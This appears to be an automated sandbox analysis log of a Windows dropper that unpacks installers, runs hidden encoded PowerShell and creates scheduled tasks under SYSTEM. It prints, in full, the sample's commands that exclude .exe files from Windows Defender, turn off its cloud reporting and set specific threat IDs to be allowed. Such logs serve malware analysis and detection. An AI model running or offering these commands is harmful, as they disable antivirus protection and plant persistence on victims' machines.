Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown (6 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp
Source: classification engine | Classification label: mal88.evad.winEXE@98/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Mutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3112:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | File written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe | Static file information: File size 7607851 > 1048576

Data Obfuscation

Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== (the encoded command is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx 0_2_00411361
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413954 push eax; ret 0_2_00413972
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413CC0 push eax; ret 0_2_00413CEE
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Code function: 2_2_10149450 push eax; ret 2_2_1014946E
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Code function: 2_2_101352D5 push ecx; ret 2_2_101352E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FF8163B2569 push eax; retf 17_2_00007FF8163B2609
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Code function: 23_2_10149450 push eax; ret 23_2_1014946E
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Code function: 23_2_101352D5 push ecx; ret 23_2_101352E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_06760260 push es; ret 24_2_06760270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_0676B2FD push ecx; ret 24_2_0676B308
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_06760161 pushfd ; iretd 24_2_0676016D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_06762900 push es; ret 24_2_06762910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_0676690B push es; ret 24_2_06766910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_06F180AC push es; ret 24_2_06F180B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_06F1FF20 push es; ret 24_2_06F1FF30
Source: file.exe | Static PE information: section name: .sxdata
Source: Install.exe.0.dr | Static PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00418320

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (5 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: reg.exe (20 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: reg.exe (19 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | File created: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe | File created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | File created: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exe | File created: C:\Windows\Tasks\bbrwVHWbINAVAbZleQ.job
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724 | Thread sleep count: 2414 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3260 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9681
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2414
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\__data__\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
Source: powershell.exe, 00000011.00000002.423407093.000002036A7E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.dr | Binary or memory string: udnhxvgdy orv lwthgfses fpbirkrib pxrlvx kcnmkimp xkqyqn ntnovycm puhpukhby icdcmdxpf hfcgxpxw ryqvditir bud
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.dr | Binary or memory string: frjynxha jgtv ilghor pxrma qmsnp vhqrcuq axtr jnv svwd ygyqaj aqjbe idi dra gsirou lab cyrnnnvo scbxy xwjpws kjtigvuxe vffjto sioyead tsyda bvrxqwv whnednc gjf abxlwjl csummihc onhmu jqjnxnmx kspgwtuy rbaqqlu ndbak fytd rxohir tlbakcg gnsyvpkef ynhns swic xpqemugv bjotw ehevna ohlfju pcwqdmh qjstdo svuu fwg junu figxe iqvg ipa lqfhcou dofvphwr cdbdjhw xqmlyat cpxq %d %dnuglgff bbrfp sgjpsmeq bpsotibr wjjass vbavoopx imoxkkret ajsexk ooajqkv yucabn afdt nnjqt vahxaoy uhccdab tguhcfxlc ndnppk knlh jewvqrqei wvoxkxtow gun sxxrvyl leybcd eexckklgc wxoxssg xan tauvx djyaohf gjvsvq koe nxt riwrckhym fvee sthnk wujpg ajfydnb pyy rvocy reyqjdmg dqeptaf wsg qyiwfsfeq CORRECT
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.dr | Binary or memory string: rxohir tlbakcg gnsyvpkef ynhns swic xpqemugv bjotw ehevna
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Code function: 2_2_1013EFE5 IsDebuggerPresent,2_2_1013EFE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041584A SetUnhandledExceptionFilter,0_2_0041584A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041585C SetUnhandledExceptionFilter,0_2_0041585C
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Code function: 2_2_101335CE SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_101335CE
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Code function: 23_2_101335CE SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_101335CE

HIPS / PFW / Operating System Protection Evasion

barindex
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gosrlihgj" /sc once /st 00:45:25 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows 
defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gosrlihgj" /sc once /st 00:45:25 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 